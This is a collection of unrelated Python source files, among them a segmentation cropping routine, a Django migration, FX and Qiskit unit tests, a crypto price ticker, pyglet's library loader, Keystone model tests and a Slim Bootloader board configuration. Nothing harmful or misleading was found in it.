start_depth = end_depth - desired_depth
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_depth = min_depth
end_depth = start_depth + desired_depth
else:
end_depth = max_depth
start_depth = max_depth - desired_depth
if difference_height < desired_height:
start_height = np.random.randint(min_height // 2, min_height)
end_height = min(start_height + desired_height, 240)
if end_height == 240:
start_height = end_height - desired_height
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_height = min_height
end_height = start_height + desired_height
else:
end_height = max_height
start_height = max_height - desired_height
if difference_width < desired_width:
start_width = np.random.randint(min_width // 2, min_width)
end_width = min(start_width + desired_width, 240)
if end_width == 240:
start_width = end_width - desired_width
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_width = min_width
end_width = start_width + desired_width
else:
end_width = max_width
start_width = max_width - desired_width
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
final_seg = np.zeros((3, ) + new_seg.shape)
final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width |
py | 1a3f7a4adc3018d806a5388a4157f44203c2cbd5 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.11 on 2016-12-01 05:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("resolwe_bio", "0008_migrate_sample"),
]
operations = [
migrations.AlterUniqueTogether(name="sample", unique_together=set([]),),
migrations.RemoveField(model_name="sample", name="collections",),
migrations.RemoveField(model_name="sample", name="contributor",),
migrations.RemoveField(model_name="sample", name="data",),
migrations.RemoveField(model_name="sample", name="descriptor_schema",),
migrations.RemoveField(model_name="sample", name="public_processes",),
migrations.DeleteModel(name="Sample",),
]
|
py | 1a3f7ab88ee79216331b9a17dfe7703cf41e8da8 | from . import generators as gen
from datetime import date
import pytest
import settler as s
# -- example-based tests --
@pytest.mark.parametrize('trade_date,tenor,expected', [
(date(2021, 11, 1), 'TOM', date(2021, 11, 2))])
def test_tenors_before_spot(trade_date, tenor, expected):
vd = s.ValueDateCalculator()
assert vd.value_date_for('USDSGD', tenor, trade_date) == expected
@pytest.mark.parametrize('trade_date,tenor,expected', [
(date(2021, 11, 1), '1W', date(2021, 11, 10)),
(date(2021, 11, 1), '1M', date(2021, 12, 3))])
def test_tenors_beyond_spot_starts_from_spot(trade_date, tenor, expected):
vd = s.ValueDateCalculator()
assert vd.value_date_for('USDSGD', tenor, trade_date) == expected
|
py | 1a3f7aff08e3b61e58932921c7b335068d030eef |
from enum import Enum, unique
import json
import re
import requests
from bs4 import BeautifulSoup
BASE_URL = "https://min-api.cryptocompare.com/data/generateAvg?fsym=%s&tsym=%s&markets=%s"
KOIMIM_URL = "https://koinim.com/ticker/"
@unique
class Markets(Enum):
Paribu = 'Paribu'
Koinim = 'Koinim'
Cexio = 'Cexio'
Bitstamp = 'Bitstamp'
Bitfinex = 'Bitfinex'
Poloniex = 'Poloniex'
BTCE = 'BTCE'
OKCoin = 'OKCoin'
Coinbase = 'Coinbase'
Kraken = 'Kraken'
class Ticker:
'''Ticker api for some popular markets.'''
def __init__(self):
self._market = None
self._couple = None
@property
def pair(self):
return self._couple
@pair.setter
def pair(self, value):
self._couple = value
return self._couple
@property
def market(self):
return self._market
@market.setter
def market(self, value):
self._market = value
return self._market
def ticker(self):
couple = self._couple.split('/')
request_url = BASE_URL % (couple[0], couple[1], self._market.value)
result = self.__api_call(request_url)
try:
if self.market == Markets.Koinim and self.pair == 'BTC/TRY':
result = {
'price': "₺ {:,.2f}".format(result['last_order']),
'volume24h': "Ƀ {:,.2f}".format(result['volume']),
'open24h': 'NaN',
'high24h': "₺ {:,.2f}".format(result['high']),
'low24h': "₺ {:,.2f}".format(result['low']),
'change24h': "% {:.2f}".format(result['change_rate'])
}
return result
elif self.market == Markets.Paribu and self.pair == 'BTC/TRY':
return self.paribu_ticker()
result = {
'price': result['DISPLAY']['PRICE'],
'volume24h': result['DISPLAY']['VOLUME24HOUR'],
'open24h': result['DISPLAY']['OPEN24HOUR'],
'high24h': result['DISPLAY']['HIGH24HOUR'],
'low24h': result['DISPLAY']['LOW24HOUR'],
'change24h': result['DISPLAY']['CHANGE24HOUR']
}
except KeyError:
return None
return result
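    # Illustrative usage sketch (added for clarity; not part of the original module):
    #
    #   t = Ticker()
    #   t.market = Markets.Bitstamp
    #   t.pair = 'BTC/USD'
    #   quote = t.ticker()
    #   # -> dict with 'price', 'volume24h', 'open24h', 'high24h', 'low24h',
    #   #    'change24h', or None if the upstream response is missing fields.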
def paribu_ticker(self):
html_doc = requests.get('https://www.paribu.com').text
soup = BeautifulSoup(html_doc, 'html.parser')
js_text = soup.find('script', type="text/javascript").text
regex = re.compile('("day_stats"):(.*?)$|,', re.MULTILINE)
js_text = re.findall(regex, js_text)[7][1]
result = json.loads(re.sub("}}};", "", js_text))
result = {
'price': "₺ {:,.2f}".format(result['lst']),
'volume24h': "NaN",
'open24h': 'NaN',
'high24h': "₺ {:,.2f}".format(result['max']),
'low24h': "₺ {:,.2f}".format(result['min']),
'change24h': "₺ {:.2f}".format(result['chg'])
}
return result
def __api_call(self, uri):
if self.market == Markets.Koinim:
result = requests.get(KOIMIM_URL).json()
return result
result = requests.get(uri).json()
return result
|
py | 1a3f7b3198f26dd443f6f7ee830dfc1a478a2965 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test AerPauliExpectation """
import itertools
import unittest
from test.python.opflow import QiskitOpflowTestCase
import numpy as np
from qiskit.circuit.library import RealAmplitudes
from qiskit.opflow import (
CX,
AerPauliExpectation,
CircuitSampler,
CircuitStateFn,
H,
I,
ListOp,
Minus,
One,
PauliExpectation,
PauliSumOp,
Plus,
S,
StateFn,
X,
Y,
Z,
Zero,
)
from qiskit.utils import QuantumInstance
class TestAerPauliExpectation(QiskitOpflowTestCase):
"""Pauli Change of Basis Expectation tests."""
def setUp(self) -> None:
super().setUp()
try:
from qiskit import Aer
self.seed = 97
self.backend = Aer.get_backend("aer_simulator")
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed
)
self.sampler = CircuitSampler(q_instance, attach_results=True)
self.expect = AerPauliExpectation()
except Exception as ex: # pylint: disable=broad-except
self.skipTest(f"Aer doesn't appear to be installed. Error: '{str(ex)}'")
return
def test_pauli_expect_pair(self):
"""pauli expect pair test"""
op = Z ^ Z
# wvf = (Pl^Pl) + (Ze^Ze)
wvf = CX @ (H ^ I) @ Zero
converted_meas = self.expect.convert(~StateFn(op) @ wvf)
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), 0, delta=0.1)
def test_pauli_expect_single(self):
"""pauli expect single test"""
paulis = [Z, X, Y, I]
states = [Zero, One, Plus, Minus, S @ Plus, S @ Minus]
for pauli, state in itertools.product(paulis, states):
converted_meas = self.expect.convert(~StateFn(pauli) @ state)
matmulmean = state.adjoint().to_matrix() @ pauli.to_matrix() @ state.to_matrix()
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), matmulmean, delta=0.1)
def test_pauli_expect_op_vector(self):
"""pauli expect op vector test"""
paulis_op = ListOp([X, Y, Z, I])
converted_meas = self.expect.convert(~StateFn(paulis_op))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(sampled_plus.eval(), [1, 0, 0, 1], decimal=1)
minus_mean = converted_meas @ Minus
sampled_minus = self.sampler.convert(minus_mean)
np.testing.assert_array_almost_equal(sampled_minus.eval(), [-1, 0, 0, 1], decimal=1)
zero_mean = converted_meas @ Zero
sampled_zero = self.sampler.convert(zero_mean)
np.testing.assert_array_almost_equal(sampled_zero.eval(), [0, 0, 1, 1], decimal=1)
sum_zero = (Plus + Minus) * (0.5 ** 0.5)
sum_zero_mean = converted_meas @ sum_zero
sampled_zero_mean = self.sampler.convert(sum_zero_mean)
# !!NOTE!!: Depolarizing channel (Sampling) means interference
# does not happen between circuits in sum, so expectation does
# not equal expectation for Zero!!
np.testing.assert_array_almost_equal(sampled_zero_mean.eval(), [0, 0, 0, 1])
def test_pauli_expect_state_vector(self):
"""pauli expect state vector test"""
states_op = ListOp([One, Zero, Plus, Minus])
paulis_op = X
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
# Small test to see if execution results are accessible
for composed_op in sampled:
self.assertTrue(hasattr(composed_op[0], "execution_results"))
np.testing.assert_array_almost_equal(sampled.eval(), [0, 0, 1, -1], decimal=1)
def test_pauli_expect_op_vector_state_vector(self):
"""pauli expect op vector state vector test"""
paulis_op = ListOp([X, Y, Z, I])
states_op = ListOp([One, Zero, Plus, Minus])
valids = [
[+0, 0, 1, -1],
[+0, 0, 0, 0],
[-1, 1, 0, -0],
[+1, 1, 1, 1],
]
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
np.testing.assert_array_almost_equal(sampled.eval(), valids, decimal=1)
def test_multi_representation_ops(self):
"""Test observables with mixed representations"""
mixed_ops = ListOp([X.to_matrix_op(), H, H + I, X])
converted_meas = self.expect.convert(~StateFn(mixed_ops))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(
sampled_plus.eval(), [1, 0.5 ** 0.5, (1 + 0.5 ** 0.5), 1], decimal=1
)
@unittest.skip("Skip until https://github.com/Qiskit/qiskit-aer/issues/1249 is closed.")
def test_parameterized_qobj(self):
"""grouped pauli expectation test"""
two_qubit_h2 = (
(-1.052373245772859 * I ^ I)
+ (0.39793742484318045 * I ^ Z)
+ (-0.39793742484318045 * Z ^ I)
+ (-0.01128010425623538 * Z ^ Z)
+ (0.18093119978423156 * X ^ X)
)
aer_sampler = CircuitSampler(
self.sampler.quantum_instance, param_qobj=True, attach_results=True
)
ansatz = RealAmplitudes()
ansatz.num_qubits = 2
observable_meas = self.expect.convert(StateFn(two_qubit_h2, is_measurement=True))
ansatz_circuit_op = CircuitStateFn(ansatz)
expect_op = observable_meas.compose(ansatz_circuit_op).reduce()
def generate_parameters(num):
param_bindings = {}
for param in ansatz.parameters:
values = []
for _ in range(num):
values.append(np.random.rand())
param_bindings[param] = values
return param_bindings
def validate_sampler(ideal, sut, param_bindings):
expect_sampled = ideal.convert(expect_op, params=param_bindings).eval()
actual_sampled = sut.convert(expect_op, params=param_bindings).eval()
self.assertTrue(
np.allclose(actual_sampled, expect_sampled),
f"{actual_sampled} != {expect_sampled}",
)
def get_circuit_templates(sampler):
return sampler._transpiled_circ_templates
def validate_aer_binding_used(templates):
self.assertIsNotNone(templates)
def validate_aer_templates_reused(prev_templates, cur_templates):
self.assertIs(prev_templates, cur_templates)
validate_sampler(self.sampler, aer_sampler, generate_parameters(1))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_binding_used(cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2)) # same num of params
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
def test_pauli_expectation_param_qobj(self):
"""Test PauliExpectation with param_qobj"""
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed, shots=10000
)
qubit_op = (0.1 * I ^ I) + (0.2 * I ^ Z) + (0.3 * Z ^ I) + (0.4 * Z ^ Z) + (0.5 * X ^ X)
ansatz = RealAmplitudes(qubit_op.num_qubits)
ansatz_circuit_op = CircuitStateFn(ansatz)
observable = PauliExpectation().convert(~StateFn(qubit_op))
expect_op = observable.compose(ansatz_circuit_op).reduce()
params1 = {}
params2 = {}
for param in ansatz.parameters:
params1[param] = [0]
params2[param] = [0, 0]
sampler1 = CircuitSampler(backend=q_instance, param_qobj=False)
samples1 = sampler1.convert(expect_op, params=params1)
val1 = np.real(samples1.eval())[0]
samples2 = sampler1.convert(expect_op, params=params2)
val2 = np.real(samples2.eval())
sampler2 = CircuitSampler(backend=q_instance, param_qobj=True)
samples3 = sampler2.convert(expect_op, params=params1)
val3 = np.real(samples3.eval())
samples4 = sampler2.convert(expect_op, params=params2)
val4 = np.real(samples4.eval())
np.testing.assert_array_almost_equal([val1] * 2, val2, decimal=2)
np.testing.assert_array_almost_equal(val1, val3, decimal=2)
np.testing.assert_array_almost_equal([val1] * 2, val4, decimal=2)
def test_list_pauli_sum(self):
"""Test AerPauliExpectation for ListOp[PauliSumOp]"""
test_op = ListOp([PauliSumOp.from_list([("XX", 1), ("ZI", 3), ("ZZ", 5)])])
observable = AerPauliExpectation().convert(~StateFn(test_op))
self.assertIsInstance(observable, ListOp)
self.assertIsInstance(observable[0], CircuitStateFn)
self.assertTrue(observable[0].is_measurement)
def test_expectation_with_coeff(self):
"""Test AerPauliExpectation with coefficients."""
with self.subTest("integer coefficients"):
exp = 3 * ~StateFn(X) @ (2 * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12)
with self.subTest("complex coefficients"):
exp = 3j * ~StateFn(X) @ (2j * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12j)
if __name__ == "__main__":
unittest.main()
|
py | 1a3f7c07497c87dc6f66cb1c5a3c00f92dfd67aa | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2020 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
"""Functions for loading dynamic libraries.
These extend and correct ctypes functions.
"""
import os
import re
import sys
import ctypes
import ctypes.util
import pyglet
_debug_lib = pyglet.options['debug_lib']
_debug_trace = pyglet.options['debug_trace']
_is_pyglet_doc_run = getattr(sys, "is_pyglet_doc_run", False)
if pyglet.options['search_local_libs']:
script_path = pyglet.resource.get_script_home()
cwd = os.getcwd()
_local_lib_paths = [script_path, os.path.join(script_path, 'lib'), os.path.join(cwd, 'lib')]
if pyglet.compat_platform == 'win32':
os.environ["PATH"] += os.pathsep + os.pathsep.join(_local_lib_paths)
else:
_local_lib_paths = None
class _TraceFunction:
def __init__(self, func):
self.__dict__['_func'] = func
def __str__(self):
return self._func.__name__
def __call__(self, *args, **kwargs):
return self._func(*args, **kwargs)
def __getattr__(self, name):
return getattr(self._func, name)
def __setattr__(self, name, value):
setattr(self._func, name, value)
class _TraceLibrary:
def __init__(self, library):
self._library = library
print(library)
def __getattr__(self, name):
func = getattr(self._library, name)
f = _TraceFunction(func)
return f
if _is_pyglet_doc_run:
class LibraryMock:
"""Mock library used when generating documentation."""
def __getattr__(self, name):
return LibraryMock()
def __setattr__(self, name, value):
pass
def __call__(self, *args, **kwargs):
return LibraryMock()
class LibraryLoader:
platform = pyglet.compat_platform
# this is only for library loading, don't include it in pyglet.platform
if platform == 'cygwin':
platform = 'win32'
def load_library(self, *names, **kwargs):
"""Find and load a library.
More than one name can be specified, they will be tried in order.
Platform-specific library names (given as kwargs) are tried first.
Raises ImportError if library is not found.
"""
if _is_pyglet_doc_run:
return LibraryMock()
if 'framework' in kwargs and self.platform == 'darwin':
return self.load_framework(kwargs['framework'])
if not names:
raise ImportError("No library name specified")
platform_names = kwargs.get(self.platform, [])
if isinstance(platform_names, str):
platform_names = [platform_names]
elif type(platform_names) is tuple:
platform_names = list(platform_names)
if self.platform.startswith('linux'):
for name in names:
libname = self.find_library(name)
platform_names.append(libname or 'lib%s.so' % name)
platform_names.extend(names)
for name in platform_names:
try:
lib = ctypes.cdll.LoadLibrary(name)
if _debug_lib:
print(name)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError as o:
path = self.find_library(name)
if path:
try:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError:
pass
elif self.platform == "win32" and o.winerror != 126:
raise ImportError("Unexpected error loading library %s: %s" % (name, str(o)))
raise ImportError('Library "%s" not found.' % names[0])
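    # Illustrative call pattern (a sketch, not part of the original source): the
    # positional arguments are generic library names and the kwargs give
    # platform-specific overrides, e.g.
    #
    #   lib = pyglet.lib.load_library('GL', win32='opengl32', framework='OpenGL')
    #
    # On Darwin the 'framework' kwarg is used; on Windows the 'win32' names are
    # tried before the generic ones.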
def find_library(self, name):
return ctypes.util.find_library(name)
@staticmethod
def load_framework(name):
raise RuntimeError("Can't load framework on this platform.")
class MachOLibraryLoader(LibraryLoader):
def __init__(self):
if 'LD_LIBRARY_PATH' in os.environ:
self.ld_library_path = os.environ['LD_LIBRARY_PATH'].split(':')
else:
self.ld_library_path = []
if _local_lib_paths:
# search first for local libs
self.ld_library_path = _local_lib_paths + self.ld_library_path
os.environ['LD_LIBRARY_PATH'] = ':'.join(self.ld_library_path)
if 'DYLD_LIBRARY_PATH' in os.environ:
self.dyld_library_path = os.environ['DYLD_LIBRARY_PATH'].split(':')
else:
self.dyld_library_path = []
if 'DYLD_FALLBACK_LIBRARY_PATH' in os.environ:
self.dyld_fallback_library_path = os.environ['DYLD_FALLBACK_LIBRARY_PATH'].split(':')
else:
self.dyld_fallback_library_path = [os.path.expanduser('~/lib'), '/usr/local/lib', '/usr/lib']
def find_library(self, path):
"""Implements the dylib search as specified in Apple documentation:
http://developer.apple.com/library/content/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/DynamicLibraryUsageGuidelines.html
Before commencing the standard search, the method first checks
the bundle's ``Frameworks`` directory if the application is running
within a bundle (OS X .app).
"""
libname = os.path.basename(path)
search_path = []
if '.dylib' not in libname:
libname = 'lib' + libname + '.dylib'
# py2app support
if getattr(sys, 'frozen', None) == 'macosx_app' and 'RESOURCEPATH' in os.environ:
search_path.append(os.path.join(os.environ['RESOURCEPATH'],
'..',
'Frameworks',
libname))
# conda support
if os.environ.get('CONDA_PREFIX', False):
search_path.append(os.path.join(os.environ['CONDA_PREFIX'], 'lib', libname))
# pyinstaller.py sets sys.frozen to True, and puts dylibs in
# Contents/MacOS, which path pyinstaller puts in sys._MEIPASS
if (hasattr(sys, 'frozen') and hasattr(sys, '_MEIPASS') and
sys.frozen is True and pyglet.compat_platform == 'darwin'):
search_path.append(os.path.join(sys._MEIPASS, libname))
if '/' in path:
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
else:
search_path.extend([os.path.join(p, libname) for p in self.ld_library_path])
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
for path in search_path:
if os.path.exists(path):
return path
return None
@staticmethod
def load_framework(name):
path = ctypes.util.find_library(name)
# Hack for compatibility with macOS > 11.0
if path is None:
frameworks = {
'AGL': '/System/Library/Frameworks/AGL.framework/AGL',
'IOKit': '/System/Library/Frameworks/IOKit.framework/IOKit',
'OpenAL': '/System/Library/Frameworks/OpenAL.framework/OpenAL',
'OpenGL': '/System/Library/Frameworks/OpenGL.framework/OpenGL'
}
path = frameworks.get(name)
if path:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
raise ImportError("Can't find framework %s." % name)
class LinuxLibraryLoader(LibraryLoader):
_ld_so_cache = None
_local_libs_cache = None
@staticmethod
def _find_libs(directories):
cache = {}
lib_re = re.compile(r'lib(.*)\.so(?:$|\.)')
for directory in directories:
try:
for file in os.listdir(directory):
match = lib_re.match(file)
if match:
# Index by filename
path = os.path.join(directory, file)
if file not in cache:
cache[file] = path
# Index by library name
library = match.group(1)
if library not in cache:
cache[library] = path
except OSError:
pass
return cache
def _create_ld_so_cache(self):
# Recreate search path followed by ld.so. This is going to be
# slow to build, and incorrect (ld.so uses ld.so.cache, which may
# not be up-to-date). Used only as fallback for distros without
# /sbin/ldconfig.
#
# We assume the DT_RPATH and DT_RUNPATH binary sections are omitted.
directories = []
try:
directories.extend(os.environ['LD_LIBRARY_PATH'].split(':'))
except KeyError:
pass
try:
with open('/etc/ld.so.conf') as fid:
directories.extend([dir.strip() for dir in fid])
except IOError:
pass
directories.extend(['/lib', '/usr/lib'])
self._ld_so_cache = self._find_libs(directories)
def find_library(self, path):
# search first for local libs
if _local_lib_paths:
if not self._local_libs_cache:
self._local_libs_cache = self._find_libs(_local_lib_paths)
if path in self._local_libs_cache:
return self._local_libs_cache[path]
# ctypes tries ldconfig, gcc and objdump. If none of these are
# present, we implement the ld-linux.so search path as described in
# the man page.
result = ctypes.util.find_library(path)
if result:
return result
if self._ld_so_cache is None:
self._create_ld_so_cache()
return self._ld_so_cache.get(path)
if pyglet.compat_platform == 'darwin':
loader = MachOLibraryLoader()
elif pyglet.compat_platform.startswith('linux'):
loader = LinuxLibraryLoader()
else:
loader = LibraryLoader()
load_library = loader.load_library
|
py | 1a3f7c4f83eafe11b94ed9229bdaf3d09094b064 | import json
from lxml import etree
import unittest2 as unittest
from keystone.models import User
from keystone.test import utils as testutils
class TestModelsUser(unittest.TestCase):
'''Unit tests for keystone/models.py:User class.'''
def test_user(self):
user = User()
self.assertEquals(str(user.__class__),
"<class 'keystone.models.User'>",
"user should be of instance "
"class keystone.models.User but instead "
"was '%s'" % str(user.__class__))
self.assertIsInstance(user, dict, "")
def test_user_static_properties(self):
user = User(id=1, name="the user", blank=None)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
self.assertRaises(AttributeError, getattr, user,
'some_bad_property')
def test_user_properties(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
self.assertEquals(user["dynamic"], "test")
def test_user_json_serialization(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
json_str = user.to_json()
d1 = json.loads(json_str)
d2 = json.loads('{"user": {"name": "the user", \
"id": 1, "dynamic": "test"}}')
self.assertDictEqual(d1, d2)
def test_user_xml_serialization(self):
user = User(id=1, name="the user", blank=None)
xml_str = user.to_xml()
self.assertTrue(testutils.XMLTools.xmlEqual(xml_str,
'<user name="the user" id="1"/>'))
def test_user_json_deserialization(self):
user = User.from_json('{"name": "the user", "id": 1}',
hints={"contract_attributes": ['id', 'name']})
self.assertIsInstance(user, User)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
def test_user_xml_deserialization(self):
user = User(id=1, name="the user", blank=None)
self.assertIsInstance(user, User)
def test_user_inspection(self):
user = User(id=1, name="the user", blank=None)
self.assertFalse(user.inspect())
def test_user_validation(self):
user = User(id=1, name="the user", blank=None)
self.assertTrue(user.validate())
if __name__ == '__main__':
unittest.main()
|
py | 1a3f7c7ebac358e36e7c43b36edd46a5b0269f29 | ## @file
# This file is used to provide board specific image information.
#
# Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
import os
import sys
sys.dont_write_bytecode = True
sys.path.append (os.path.join('..', '..'))
from BuildLoader import FLASH_MAP, BaseBoard, STITCH_OPS, HASH_USAGE
from BuildLoader import IPP_CRYPTO_OPTIMIZATION_MASK, IPP_CRYPTO_ALG_MASK
#
# Temporary Memory Layout for APL
#
# FF000000 +--------------------------+
# | Stage1B |
# | (Decompressed) |
# FEF80000 +--------------------------+
# | Stage1 Heap/Stack |
# FEF70000 +--------------------------+
# | Not Used |
# +-------------+------------+
# | Free |
# | |------------|
# +-------------+ MRC NVS |
# | | |
# FEF40000 +- Stage1B -+------------+
# | Compressed | FSP Mem |
# FEF16000 | +------------+
# | | |
# FEF10000 --------------+------------+
# | N/A (Don't use) |
# FEF08000 +--------------------------+
# | Stage1A |
# FEF00000 +--------------------------+
#
class Board(BaseBoard):
def __init__(self, *args, **kwargs):
super(Board, self).__init__(*args, **kwargs)
self.VERINFO_IMAGE_ID = 'SB_APLI '
self.VERINFO_PROJ_MAJOR_VER = 1
self.VERINFO_PROJ_MINOR_VER = 0
self.VERINFO_SVN = 1
self.VERINFO_BUILD_DATE = '05/20/2018'
self.BOARD_NAME = 'apl'
self.BOARD_PKG_NAME = 'ApollolakeBoardPkg'
self.SILICON_PKG_NAME = 'ApollolakePkg'
self._PCI_ENUM_DOWNGRADE_PMEM64 = 1
self.PCI_IO_BASE = 0x00001000
self.PCI_MEM32_BASE = 0x80000000
self.PCI_MEM64_BASE = 0x400000000
self.FLASH_SIZE = 0x800000
self.FLASH_BASE = self.FLASH_LAYOUT_START - self.FLASH_SIZE
self.HAVE_VBT_BIN = 1
self.HAVE_VERIFIED_BOOT = 1
self.HAVE_MEASURED_BOOT = 0
self.HAVE_SEED_LIST = 0
self.HAVE_PSD_TABLE = 1
self.ENABLE_SMBIOS = 1
self.ENABLE_FSP_LOAD_IMAGE = 0
self.ENABLE_VTD = 1
self.ENABLE_FWU = 1
self.ENABLE_SPLASH = 1
self.ENABLE_FRAMEBUFFER_INIT = 1
self.ENABLE_GRUB_CONFIG = 1
self.ENABLE_DMA_PROTECTION = 0
# G9 for 384 | W7 Opt for SHA384| Ni Opt for SHA256| V8 Opt for SHA256
self.ENABLE_CRYPTO_SHA_OPT = IPP_CRYPTO_OPTIMIZATION_MASK['SHA256_NI']
        # To enable source debug, set self.ENABLE_SOURCE_DEBUG to 1
# self.ENABLE_SOURCE_DEBUG = 1
# Temporary skip Stage1A due to 32KB(IBBL) size limitation
# until library size optimization has done.
# If ENABLE_SOURCE_DEBUG is disabled, SKIP_STAGE1A_SOURCE_DEBUG will be ignored
self.SKIP_STAGE1A_SOURCE_DEBUG = 1
# BIT0:Serial BIT1:USB KB
# Support serial port input console by default
self.CONSOLE_IN_DEVICE_MASK = 0x00000001
# BIT0:Serial BIT1:GFX
self.CONSOLE_OUT_DEVICE_MASK = 0x00000001
# Mem | NVMe | Usb | Spi | Ufs | eMMC | SD | Sata
self.BOOT_MEDIA_SUPPORT_MASK = 0xBF
# EXT | FAT
self.FILE_SYSTEM_SUPPORT_MASK = 3
# Verify required minimum FSP version
self.MIN_FSP_REVISION = 0x01040301
# Verify FSP image ID. Empty string means skipping verification
self.FSP_IMAGE_ID = '$APLFSP$'
self.STAGE1A_SIZE = 0x00008000
self.STAGE1B_SIZE = 0x00035000
if self.ENABLE_SOURCE_DEBUG:
self.STAGE1B_SIZE += 0x2000
self.STAGE2_SIZE = 0x00032000
self.PAYLOAD_SIZE = 0x0001F000
if len(self._PAYLOAD_NAME.split(';')) > 1:
# EPAYLOAD is specified
self.EPAYLOAD_SIZE = 0x00130000
self.UEFI_VARIABLE_SIZE = 0x00040000
else:
# EPAYLOAD does not exist, create a dummy one
self.EPAYLOAD_SIZE = 0x1000
self.UEFI_VARIABLE_SIZE = 0x1000
if self.FSPDEBUG_MODE == 1:
self.STAGE1B_SIZE += 0x00009000
self.STAGE2_SIZE += 0x0000F000
self.STAGE1A_XIP = 0
self.STAGE1A_LOAD_BASE = 0xFEF00000
self.STAGE1B_XIP = 0
self.STAGE1B_LOAD_BASE = 0xFEF10000
self.STAGE1B_FD_BASE = 0xFEF80000
self.STAGE1B_FD_SIZE = 0x0006B000
if self.RELEASE_MODE == 0:
self.STAGE1B_FD_SIZE += 0x00002000
self.PAYLOAD_SIZE += 0x00005000
# For Stage2, it is always compressed.
# if STAGE2_LOAD_HIGH is 1, STAGE2_FD_BASE will be ignored
self.STAGE2_FD_BASE = 0x01000000
self.STAGE2_FD_SIZE = 0x00080000
self.STAGE2_LOAD_BASE = 0x00100000
self.STAGE1_STACK_SIZE = 0x00002000
self.STAGE1_DATA_SIZE = 0x0000E000
# Offset is relative to the temporary memory base 0xFEF00000
self.STAGE1_STACK_BASE_OFFSET = 0x00080000 - (self.STAGE1_STACK_SIZE + self.STAGE1_DATA_SIZE)
# To support large payload such as UEFI
self.LOADER_RSVD_MEM_SIZE = 0x00B8C000
